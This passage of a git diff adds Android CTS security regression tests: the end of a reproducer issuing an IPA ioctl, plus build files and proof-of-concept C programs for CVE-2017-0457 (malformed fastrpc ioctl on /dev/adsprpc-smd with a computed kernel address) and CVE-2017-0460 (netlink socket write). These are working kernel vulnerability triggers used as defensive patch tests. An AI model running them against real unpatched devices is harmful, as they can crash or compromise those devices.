+ *(uint8_t *)0x20002bd4 = (uint8_t)0x8;
+ *(uint32_t *)0x20002bd8 = (uint32_t)0x40;
+ *(uint8_t *)0x20002bdc = (uint8_t)0x9;
+ *(uint8_t *)0x20002be0 = (uint8_t)0x7fff;
+ *(uint32_t *)0x20002be4 = (uint32_t)0x101;
+ *(uint32_t *)0x20002be8 = (uint32_t)0x5;
+ *(uint8_t *)0x20002bec = (uint8_t)0xae1;
+ *(uint8_t *)0x20002bed = (uint8_t)0x5;
+ *(uint32_t *)0x20002bf0 = (uint32_t)0x1;
+ *(uint32_t *)0x20002bf4 = (uint32_t)0x8;
+ *(uint32_t *)0x20002bf8 = (uint32_t)0xc7;
+ *(uint16_t *)0x20002bfc = (uint16_t)0x6;
+ *(uint16_t *)0x20002bfe = (uint16_t)0x8;
+ *(uint16_t *)0x20002c00 = (uint16_t)0x200;
+ *(uint16_t *)0x20002c02 = (uint16_t)0x7;
+ *(uint8_t *)0x20002c04 = (uint8_t)0x7fff;
+ *(uint8_t *)0x20002c05 = (uint8_t)0x7;
+ *(uint8_t *)0x20002c06 = (uint8_t)0x6;
+ *(uint8_t *)0x20002c07 = (uint8_t)0xe265;
+ *(uint32_t *)0x20002c08 = (uint32_t)0x7fff;
+ *(uint16_t *)0x20002c0c = (uint16_t)0x8;
+ *(uint16_t *)0x20002c0e = (uint16_t)0x0;
+ *(uint32_t *)0x20002c10 = (uint32_t)0x87;
+ *(uint32_t *)0x20002c14 = (uint32_t)0x1;
+ memcpy((void *)0x20002c18, "\xef\x8f\x03\xa7\x08\xdc", 6);
+ memcpy((void *)0x20002c1e, "\x7a\x29\x68\x4b\x0c\x99", 6);
+ memcpy((void *)0x20002c24, "\x51\x62\x84\x9a\xfc\xd6", 6);
+ memcpy((void *)0x20002c2a, "\x53\x67\x6b\x3c\x42\x3c", 6);
+ *(uint16_t *)0x20002c30 = (uint16_t)0x6;
+ *(uint8_t *)0x20002c32 = (uint8_t)0x1;
+ *(uint32_t *)0x20002c34 = (uint32_t)0x1;
+ *(uint8_t *)0x20002c38 = (uint8_t)0x1ff;
+ *(uint32_t *)0x20002c3c = (uint32_t)0x8360;
+ *(uint32_t *)0x20002c40 = (uint32_t)0x81;
+ *(uint32_t *)0x20002c44 = (uint32_t)0x4;
+ *(uint32_t *)0x20002c48 = (uint32_t)0x80;
+ *(uint32_t *)0x20002c4c = (uint32_t)0x3;
+ *(uint32_t *)0x20002c50 = (uint32_t)0x1f;
+ *(uint32_t *)0x20002c54 = (uint32_t)0x100000000;
+ *(uint32_t *)0x20002c58 = (uint32_t)0x400;
+ *(uint32_t *)0x20002c5c = (uint32_t)0x7;
+ *(uint32_t *)0x20002c60 = (uint32_t)0x7b;
+ *(uint32_t *)0x20002c64 = (uint32_t)0xe6ae;
+ *(uint32_t *)0x20002c68 = (uint32_t)0x21;
+ *(uint32_t *)0x20002c6c = (uint32_t)0x0;
+ *(uint32_t *)0x20002c70 = (uint32_t)0x6;
+ *(uint32_t *)0x20002c74 = (uint32_t)0x8;
+ *(uint32_t *)0x20002c78 = (uint32_t)0x8;
+ *(uint16_t *)0x20002c7c = (uint16_t)0x6;
+ *(uint8_t *)0x20002c7e = (uint8_t)0xff;
+ *(uint8_t *)0x20002c7f = (uint8_t)0xffffffffffffeb4d;
+ *(uint8_t *)0x20002c80 = (uint8_t)0x0;
+ *(uint8_t *)0x20002c81 = (uint8_t)0xa46;
+ *(uint8_t *)0x20002c82 = (uint8_t)0x6;
+ *(uint8_t *)0x20002c84 = (uint8_t)0x101;
+ *(uint16_t *)0x20002c86 = (uint16_t)0x6;
+ *(uint16_t *)0x20002c88 = (uint16_t)0x3;
+ *(uint8_t *)0x20002c8a = (uint8_t)0x0;
+ *(uint16_t *)0x20002c8c = (uint16_t)0xed;
+ *(uint16_t *)0x20002c8e = (uint16_t)0x9;
+ *(uint8_t *)0x20002c90 = (uint8_t)0x6;
+ *(uint8_t *)0x20002c94 = (uint8_t)0x5;
+ *(uint32_t *)0x20002c98 = (uint32_t)0x6;
+ *(uint32_t *)0x20002c9c = (uint32_t)0x6;
+ *(uint8_t *)0x20002ca0 = (uint8_t)0x3;
+ *(uint32_t *)0x20002ca4 = (uint32_t)0xff;
+ *(uint32_t *)0x20002ca8 = (uint32_t)0x80000000;
+ *(uint8_t *)0x20002cac = (uint8_t)0x40;
+ *(uint8_t *)0x20002cad = (uint8_t)0x200;
+ *(uint8_t *)0x20002cae = (uint8_t)0x9;
+ *(uint32_t *)0x20002cb0 = (uint32_t)0x1;
+ *(uint8_t *)0x20002cb4 = (uint8_t)0x2;
+ *(uint8_t *)0x20002cb6 = (uint8_t)0x2;
+ *(uint16_t *)0x20002cb8 = (uint16_t)0xda9c;
+ *(uint8_t *)0x20002cba = (uint8_t)0x2;
+ *(uint8_t *)0x20002cbc = (uint8_t)0xe8b;
+ *(uint32_t *)0x20002cc0 = (uint32_t)0x9;
+ *(uint8_t *)0x20002cc4 = (uint8_t)0x7fffffff;
+ *(uint8_t *)0x20002cc8 = (uint8_t)0x68f;
+ *(uint32_t *)0x20002ccc = (uint32_t)0xf32;
+ *(uint32_t *)0x20002cd0 = (uint32_t)0x6;
+ *(uint8_t *)0x20002cd4 = (uint8_t)0x4;
+ *(uint32_t *)0x20002cd8 = (uint32_t)0x7;
+ *(uint32_t *)0x20002cdc = (uint32_t)0xb9;
+ *(uint8_t *)0x20002ce0 = (uint8_t)0xf6d;
+ *(uint8_t *)0x20002ce1 = (uint8_t)0x3;
+ memcpy((void *)0x20002ce2,
+ "\x09\xb3\xdd\xd0\xb5\xb4\xa8\x63\xe2\xb4\x86\x02\xef\x48\x4e\xd1",
+ 16);
+ memcpy((void *)0x20002cf2,
+ "\x32\x86\x0e\xe4\x37\x55\x8e\xb0\xc7\x25\x05\xa2\x4a\xe1\x96\x42",
+ 16);
+ *(uint8_t *)0x20002d02 = (uint8_t)0xffff;
+ memcpy((void *)0x20002d03,
+ "\xa6\x9d\x8b\x67\xa6\x13\x60\x4f\x9a\x76\x00\x0c\xb3\x91\xae\x91",
+ 16);
+ memcpy((void *)0x20002d13,
+ "\xa3\x7a\xc4\xce\x72\x04\x46\x6d\xfc\x74\x80\x4d\x9f\xca\x67\x16",
+ 16);
+ *(uint8_t *)0x20002d23 = (uint8_t)0x3;
+ *(uint8_t *)0x20002d24 = (uint8_t)0x6;
+ *(uint32_t *)0x20002d28 = (uint32_t)0x100000000;
+ *(uint32_t *)0x20002d2c = (uint32_t)0x100000001;
+ *(uint8_t *)0x20002d30 = (uint8_t)0x100000001;
+ *(uint32_t *)0x20002d34 = (uint32_t)0x401;
+ *(uint8_t *)0x20002d38 = (uint8_t)0x8;
+ *(uint8_t *)0x20002d3c = (uint8_t)0x5;
+ *(uint32_t *)0x20002d40 = (uint32_t)0x1;
+ *(uint32_t *)0x20002d44 = (uint32_t)0x5;
+ *(uint8_t *)0x20002d48 = (uint8_t)0x7fffffff;
+ *(uint8_t *)0x20002d49 = (uint8_t)0x80;
+ *(uint32_t *)0x20002d4c = (uint32_t)0x0;
+ *(uint32_t *)0x20002d50 = (uint32_t)0xff;
+ *(uint32_t *)0x20002d54 = (uint32_t)0x4;
+ *(uint16_t *)0x20002d58 = (uint16_t)0x4;
+ *(uint16_t *)0x20002d5a = (uint16_t)0x4;
+ *(uint16_t *)0x20002d5c = (uint16_t)0x1;
+ *(uint16_t *)0x20002d5e = (uint16_t)0x3d;
+ *(uint8_t *)0x20002d60 = (uint8_t)0x7fffffff;
+ *(uint8_t *)0x20002d61 = (uint8_t)0x40;
+ *(uint8_t *)0x20002d62 = (uint8_t)0x8;
+ *(uint8_t *)0x20002d63 = (uint8_t)0x2ff;
+ *(uint32_t *)0x20002d64 = (uint32_t)0x3;
+ *(uint16_t *)0x20002d68 = (uint16_t)0x5;
+ *(uint16_t *)0x20002d6a = (uint16_t)0x0;
+ *(uint32_t *)0x20002d6c = (uint32_t)0x2;
+ *(uint32_t *)0x20002d70 = (uint32_t)0x81;
+ memcpy((void *)0x20002d74, "\xe5\xf2\x2c\xb3\xfa\x1b", 6);
+ memcpy((void *)0x20002d7a, "\xe7\x1f\xae\x9f\x54\x33", 6);
+ memcpy((void *)0x20002d80, "\x6a\xfc\x62\x48\x89\x90", 6);
+ memcpy((void *)0x20002d86, "\xbd\x61\x79\x87\xe4\x24", 6);
+ *(uint16_t *)0x20002d8c = (uint16_t)0xfffffffffffffffa;
+ *(uint8_t *)0x20002d8e = (uint8_t)0x2;
+ *(uint32_t *)0x20002d90 = (uint32_t)0x8;
+ *(uint8_t *)0x20002d94 = (uint8_t)0x1;
+ *(uint32_t *)0x20002d98 = (uint32_t)0xffffffffffff7fff;
+ *(uint32_t *)0x20002d9c = (uint32_t)0x401;
+ *(uint32_t *)0x20002da0 = (uint32_t)0x9;
+ *(uint32_t *)0x20002da4 = (uint32_t)0x2;
+ *(uint32_t *)0x20002da8 = (uint32_t)0x4;
+ *(uint32_t *)0x20002dac = (uint32_t)0x69;
+ *(uint32_t *)0x20002db0 = (uint32_t)0x8;
+ *(uint32_t *)0x20002db4 = (uint32_t)0x6;
+ *(uint32_t *)0x20002db8 = (uint32_t)0x7fff;
+ *(uint32_t *)0x20002dbc = (uint32_t)0x4;
+ *(uint32_t *)0x20002dc0 = (uint32_t)0x7fffffff;
+ *(uint32_t *)0x20002dc4 = (uint32_t)0x80;
+ *(uint32_t *)0x20002dc8 = (uint32_t)0x100;
+ *(uint32_t *)0x20002dcc = (uint32_t)0x2;
+ *(uint32_t *)0x20002dd0 = (uint32_t)0x7;
+ *(uint32_t *)0x20002dd4 = (uint32_t)0x4;
+ *(uint16_t *)0x20002dd8 = (uint16_t)0x6;
+ *(uint8_t *)0x20002dda = (uint8_t)0x10000;
+ *(uint8_t *)0x20002ddb = (uint8_t)0x0;
+ *(uint8_t *)0x20002ddc = (uint8_t)0xff;
+ *(uint8_t *)0x20002ddd = (uint8_t)0x9;
+ *(uint8_t *)0x20002dde = (uint8_t)0x10001;
+ *(uint8_t *)0x20002de0 = (uint8_t)0x8;
+ *(uint16_t *)0x20002de2 = (uint16_t)0x100;
+ *(uint16_t *)0x20002de4 = (uint16_t)0xffffffff80000001;
+ *(uint8_t *)0x20002de6 = (uint8_t)0x8000;
+ *(uint16_t *)0x20002de8 = (uint16_t)0x101;
+ *(uint16_t *)0x20002dea = (uint16_t)0x10001;
+ *(uint8_t *)0x20002dec = (uint8_t)0x101;
+ *(uint8_t *)0x20002df0 = (uint8_t)0x20000000000000;
+ *(uint32_t *)0x20002df4 = (uint32_t)0xe376;
+ *(uint32_t *)0x20002df8 = (uint32_t)0x9;
+ *(uint8_t *)0x20002dfc = (uint8_t)0x80000001;
+ *(uint32_t *)0x20002e00 = (uint32_t)0x4d6;
+ *(uint32_t *)0x20002e04 = (uint32_t)0x9;
+ *(uint8_t *)0x20002e08 = (uint8_t)0x1ff;
+ *(uint8_t *)0x20002e09 = (uint8_t)0x4;
+ *(uint8_t *)0x20002e0a = (uint8_t)0x0;
+ *(uint32_t *)0x20002e0c = (uint32_t)0xa0000000;
+ *(uint8_t *)0x20002e10 = (uint8_t)0x100000001;
+ *(uint8_t *)0x20002e12 = (uint8_t)0xa9db;
+ *(uint16_t *)0x20002e14 = (uint16_t)0x2;
+ *(uint8_t *)0x20002e16 = (uint8_t)0x9;
+ *(uint8_t *)0x20002e18 = (uint8_t)0x80;
+ *(uint32_t *)0x20002e1c = (uint32_t)0x6;
+ *(uint8_t *)0x20002e20 = (uint8_t)0x6;
+ *(uint8_t *)0x20002e24 = (uint8_t)0x9;
+ *(uint32_t *)0x20002e28 = (uint32_t)0x7c07;
+ *(uint32_t *)0x20002e2c = (uint32_t)0x80000000;
+ *(uint8_t *)0x20002e30 = (uint8_t)0x5;
+ *(uint32_t *)0x20002e34 = (uint32_t)0xd473;
+ *(uint32_t *)0x20002e38 = (uint32_t)0x7;
+ *(uint8_t *)0x20002e3c = (uint8_t)0xfffffffffffffff9;
+ *(uint8_t *)0x20002e3d = (uint8_t)0x7f;
+ memcpy((void *)0x20002e3e,
+ "\xaf\x0c\xe8\xf6\xb5\xd9\x88\x44\xa7\xbd\x6f\xf3\x39\x73\x14\xf4",
+ 16);
+ memcpy((void *)0x20002e4e,
+ "\xd5\x09\x71\xb6\xe9\x72\x21\x95\xd5\x7c\xb1\x05\x94\x0d\xca\xb8",
+ 16);
+ *(uint8_t *)0x20002e5e = (uint8_t)0xbc1c;
+ memcpy((void *)0x20002e5f,
+ "\x75\xe0\x8a\xb8\x09\xa5\x46\x75\xcd\x3f\xb3\x5c\x7c\x53\xac\x15",
+ 16);
+ memcpy((void *)0x20002e6f,
+ "\xb4\xa2\x0c\x99\x8f\x06\x34\x66\x53\x2b\xe0\x75\x21\x86\x0f\xdb",
+ 16);
+ *(uint8_t *)0x20002e7f = (uint8_t)0x88;
+ *(uint8_t *)0x20002e80 = (uint8_t)0x1;
+ *(uint32_t *)0x20002e84 = (uint32_t)0xa1;
+ *(uint32_t *)0x20002e88 = (uint32_t)0x200;
+ *(uint8_t *)0x20002e8c = (uint8_t)0x20;
+ *(uint32_t *)0x20002e90 = (uint32_t)0x6;
+ *(uint8_t *)0x20002e94 = (uint8_t)0xea;
+ *(uint8_t *)0x20002e98 = (uint8_t)0x10000;
+ *(uint32_t *)0x20002e9c = (uint32_t)0x6;
+ *(uint32_t *)0x20002ea0 = (uint32_t)0x7d;
+ *(uint8_t *)0x20002ea4 = (uint8_t)0x0;
+ *(uint8_t *)0x20002ea5 = (uint8_t)0x8001;
+ *(uint32_t *)0x20002ea8 = (uint32_t)0x0;
+ *(uint32_t *)0x20002eac = (uint32_t)0x7fffffff;
+ *(uint32_t *)0x20002eb0 = (uint32_t)0x204fec542d605987;
+ *(uint16_t *)0x20002eb4 = (uint16_t)0x6;
+ *(uint16_t *)0x20002eb6 = (uint16_t)0xffffffffffff8000;
+ *(uint16_t *)0x20002eb8 = (uint16_t)0x3ff;
+ *(uint16_t *)0x20002eba = (uint16_t)0x8000;
+ *(uint8_t *)0x20002ebc = (uint8_t)0x4;
+ *(uint8_t *)0x20002ebd = (uint8_t)0x80000001;
+ *(uint8_t *)0x20002ebe = (uint8_t)0x0;
+ *(uint8_t *)0x20002ebf = (uint8_t)0xfffffffffffffff9;
+ *(uint32_t *)0x20002ec0 = (uint32_t)0x200;
+ *(uint16_t *)0x20002ec4 = (uint16_t)0x4;
+ *(uint16_t *)0x20002ec6 = (uint16_t)0x4;
+ *(uint32_t *)0x20002ec8 = (uint32_t)0x4;
+ *(uint32_t *)0x20002ecc = (uint32_t)0xffffffff80000000;
+ memcpy((void *)0x20002ed0, "\xcc\x25\x2d\xec\x43\xe0", 6);
+ memcpy((void *)0x20002ed6, "\x85\x93\x52\x18\xcc\x56", 6);
+ memcpy((void *)0x20002edc, "\xf2\xb6\x86\x04\x46\xec", 6);
+ memcpy((void *)0x20002ee2, "\x70\x06\xb1\xfd\x68\xa5", 6);
+ *(uint16_t *)0x20002ee8 = (uint16_t)0x1000;
+ *(uint8_t *)0x20002eea = (uint8_t)0x0;
+ *(uint32_t *)0x20002eec = (uint32_t)0xbbd8;
+ *(uint8_t *)0x20002ef0 = (uint8_t)0x3;
+ *(uint32_t *)0x20002ef4 = (uint32_t)0x8;
+ *(uint32_t *)0x20002ef8 = (uint32_t)0x100;
+ *(uint32_t *)0x20002efc = (uint32_t)0x9;
+ *(uint32_t *)0x20002f00 = (uint32_t)0xfffffffffffffab9;
+ *(uint32_t *)0x20002f04 = (uint32_t)0x9;
+ *(uint32_t *)0x20002f08 = (uint32_t)0x1;
+ *(uint32_t *)0x20002f0c = (uint32_t)0xe4d1;
+ *(uint32_t *)0x20002f10 = (uint32_t)0x4;
+ *(uint32_t *)0x20002f14 = (uint32_t)0x3;
+ *(uint32_t *)0x20002f18 = (uint32_t)0x87;
+ *(uint32_t *)0x20002f1c = (uint32_t)0x8000;
+ *(uint32_t *)0x20002f20 = (uint32_t)0x7;
+ *(uint32_t *)0x20002f24 = (uint32_t)0x10001;
+ *(uint32_t *)0x20002f28 = (uint32_t)0x932d;
+ *(uint32_t *)0x20002f2c = (uint32_t)0x3;
+ *(uint32_t *)0x20002f30 = (uint32_t)0xffff;
+ *(uint16_t *)0x20002f34 = (uint16_t)0x3ff;
+ *(uint8_t *)0x20002f36 = (uint8_t)0x400;
+ *(uint8_t *)0x20002f37 = (uint8_t)0x6;
+ *(uint8_t *)0x20002f38 = (uint8_t)0x2;
+ *(uint8_t *)0x20002f39 = (uint8_t)0x1;
+ *(uint8_t *)0x20002f3a = (uint8_t)0x3;
+ *(uint8_t *)0x20002f3c = (uint8_t)0xffffffffffffff75;
+ *(uint16_t *)0x20002f3e = (uint16_t)0x20;
+ *(uint16_t *)0x20002f40 = (uint16_t)0x4;
+ *(uint8_t *)0x20002f42 = (uint8_t)0x2;
+ *(uint16_t *)0x20002f44 = (uint16_t)0x10001;
+ *(uint16_t *)0x20002f46 = (uint16_t)0x3;
+ *(uint8_t *)0x20002f48 = (uint8_t)0xb004;
+ *(uint8_t *)0x20002f4c = (uint8_t)0x5;
+ *(uint32_t *)0x20002f50 = (uint32_t)0x3f;
+ *(uint32_t *)0x20002f54 = (uint32_t)0x6;
+ *(uint8_t *)0x20002f58 = (uint8_t)0x7f;
+ *(uint32_t *)0x20002f5c = (uint32_t)0x5;
+ *(uint32_t *)0x20002f60 = (uint32_t)0x4;
+ *(uint8_t *)0x20002f64 = (uint8_t)0x5;
+ *(uint8_t *)0x20002f65 = (uint8_t)0x0;
+ *(uint8_t *)0x20002f66 = (uint8_t)0x2;
+ *(uint32_t *)0x20002f68 = (uint32_t)0x7;
+ *(uint8_t *)0x20002f6c = (uint8_t)0x80;
+ *(uint8_t *)0x20002f6e = (uint8_t)0x80;
+ *(uint16_t *)0x20002f70 = (uint16_t)0x1;
+ *(uint8_t *)0x20002f72 = (uint8_t)0xffffffff;
+ *(uint8_t *)0x20002f74 = (uint8_t)0x3259;
+ *(uint32_t *)0x20002f78 = (uint32_t)0x0;
+ *(uint8_t *)0x20002f7c = (uint8_t)0x5;
+ *(uint8_t *)0x20002f80 = (uint8_t)0x10001;
+ *(uint32_t *)0x20002f84 = (uint32_t)0x0;
+ *(uint32_t *)0x20002f88 = (uint32_t)0x10000;
+ *(uint8_t *)0x20002f8c = (uint8_t)0xffff;
+ *(uint32_t *)0x20002f90 = (uint32_t)0xffff;
+ *(uint32_t *)0x20002f94 = (uint32_t)0x7;
+ *(uint8_t *)0x20002f98 = (uint8_t)0x3;
+ *(uint8_t *)0x20002f99 = (uint8_t)0x7ff;
+ memcpy((void *)0x20002f9a,
+ "\x28\x3b\x48\x4b\x92\xd4\xf6\xbf\x35\x1b\x31\x99\x3a\xa1\x6c\xa2",
+ 16);
+ memcpy((void *)0x20002faa,
+ "\x7e\xeb\x6e\x3e\x8f\x30\x07\x0b\xe9\xfc\x36\xe6\x56\x8f\xd7\x0f",
+ 16);
+ *(uint8_t *)0x20002fba = (uint8_t)0xfffffffffffffbff;
+ memcpy((void *)0x20002fbb,
+ "\x30\x75\xd6\x40\x91\xbf\xe5\xe5\x8c\xd1\x46\x0e\x9d\x44\xc2\xa1",
+ 16);
+ memcpy((void *)0x20002fcb,
+ "\x78\xf4\x00\xa7\xbe\x73\xdf\x2e\xb7\x4d\x97\x77\x77\xdd\xb4\x2e",
+ 16);
+ *(uint8_t *)0x20002fdb = (uint8_t)0x6;
+ *(uint8_t *)0x20002fdc = (uint8_t)0x101;
+ *(uint32_t *)0x20002fe0 = (uint32_t)0xffff;
+ *(uint32_t *)0x20002fe4 = (uint32_t)0xfffffffffffffffe;
+ *(uint8_t *)0x20002fe8 = (uint8_t)0x9;
+ *(uint32_t *)0x20002fec = (uint32_t)0x3;
+ *(uint8_t *)0x20002ff0 = (uint8_t)0x7f;
+ *(uint8_t *)0x20002ff4 = (uint8_t)0x4;
+ *(uint32_t *)0x20002ff8 = (uint32_t)0x0;
+ *(uint32_t *)0x20002ffc = (uint32_t)0x0;
+
+ ioctl(fd, IPA_IOC_ADD_FLT_RULE, 0x20002924ul);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0457/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0457/Android.mk
new file mode 100644
index 0000000..37b625f
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0457/Android.mk
@@ -0,0 +1,37 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0457
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
+
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0457/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0457/poc.c
new file mode 100644
index 0000000..4fbacca
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0457/poc.c
@@ -0,0 +1,94 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+struct remote_buf {
+ void *pv; /* buffer pointer */
+ ssize_t len; /* length of buffer */
+};
+
+struct fastrpc_ioctl_invoke {
+ uint32_t handle; /* remote handle */
+ uint32_t sc; /* scalars describing the data */
+ struct remote_buf *pra; /* remote arguments list */
+};
+
+struct fastrpc_ioctl_invoke_fd {
+ struct fastrpc_ioctl_invoke inv;
+ int *fds; /* fd list */
+};
+
+/* Retrives number of input buffers from the scalars parameter */
+#define REMOTE_SCALARS_INBUFS(sc) (((sc) >> 16) & 0x0ff)
+
+/* Retrives number of output buffers from the scalars parameter */
+#define REMOTE_SCALARS_OUTBUFS(sc) (((sc) >> 8) & 0x0ff)
+
+int main() {
+ int numbuf, fd;
+
+ mmap((void *)0x20000000ul, 0x705000ul, 0x3ul, 0x32ul,
+ (int)0xffffffffffffffffl, 0x0ul);
+ fd = open("/dev/adsprpc-smd", 0x0ul, 0);
+
+ mmap((void *)0x20705000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl,
+ 0x0ul);
+ mmap((void *)0x20706000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl,
+ 0x0ul);
+ mmap((void *)0x20707000ul, 0x1000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl,
+ 0x0ul);
+ mmap((void *)0x10000, 0x100000ul, 0x3ul, 0x32ul, (int)0xffffffffffffffffl,
+ 0x0ul);
+
+ struct fastrpc_ioctl_invoke invoke_param;
+ struct remote_buf *buf;
+
+ buf = (struct remote_buf *)0x20705000;
+
+ invoke_param.handle = 5;
+ invoke_param.sc = (uint32_t)0xffffff7f;
+ invoke_param.pra = buf;
+
+ numbuf = REMOTE_SCALARS_INBUFS(invoke_param.sc) +
+ REMOTE_SCALARS_OUTBUFS(invoke_param.sc);
+
+ size_t ptr = (size_t)(0xffffff800bde0160 + 0x10000 - 0xffffffc000000000);
+
+ buf[0].pv = (void *)0x10000;
+ buf[0].len = 0x1;
+
+ ptr = ptr & 0xffffffff000fffff;
+
+ buf[508].pv = 0;
+ buf[508].len = ptr;
+ buf[509].pv = (void *)0x1ffff;
+ buf[509].len = 0;
+
+ syscall(__NR_ioctl, fd, 0xc0105201ul, &invoke_param, 0, 0, 0);
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0460/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0460/Android.mk
new file mode 100644
index 0000000..5ddb578
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0460/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2017 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+LOCAL_CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0460/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0460/poc.c
new file mode 100644
index 0000000..4ca0930
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0460/poc.c
@@ -0,0 +1,68 @@
+/**
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <pthread.h>
+#include <setjmp.h>
+#include <signal.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <syscall.h>
+#include <unistd.h>
+
+__thread int skip_segv;
+__thread jmp_buf segv_env;
+
+#define NONFAILING(...) \
+ { \
+ __atomic_fetch_add(&skip_segv, 1, __ATOMIC_SEQ_CST); \
+ if (_setjmp(segv_env) == 0) { \
+ __VA_ARGS__; \
+ } \
+ __atomic_fetch_sub(&skip_segv, 1, __ATOMIC_SEQ_CST); \
+ }
+
+#ifndef SYS_socket
+#define SYS_socket 41
+#endif
+#ifndef SYS_mmap
+#define SYS_mmap __NR_mmap
+#endif
+#ifndef __NR_mmap
+#define __NR_mmap 222
+#endif
+#ifndef SYS_syz_open_dev
+#define SYS_syz_open_dev 1000001
+#endif
+#ifndef SYS_write
+#define SYS_write 1
+#endif
+
+long r;
+
+int main() {
+ r = syscall(SYS_socket, 0x10ul, 0x3ul, 0x1ful, 0, 0, 0);
+ syscall(SYS_mmap, 0x20005000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful,
+ 0x0ul);
+ NONFAILING(*(uint32_t*)0x20005ff0 = (uint32_t)0x10);
+ NONFAILING(*(uint32_t*)0x20005ff4 = (uint32_t)0x31);
+ NONFAILING(*(uint64_t*)0x20005ff8 = (uint64_t)0xb4);
+ syscall(SYS_write, r, 0x20005ff0ul, 0x10ul, 0, 0, 0);
+ return 0;
+}
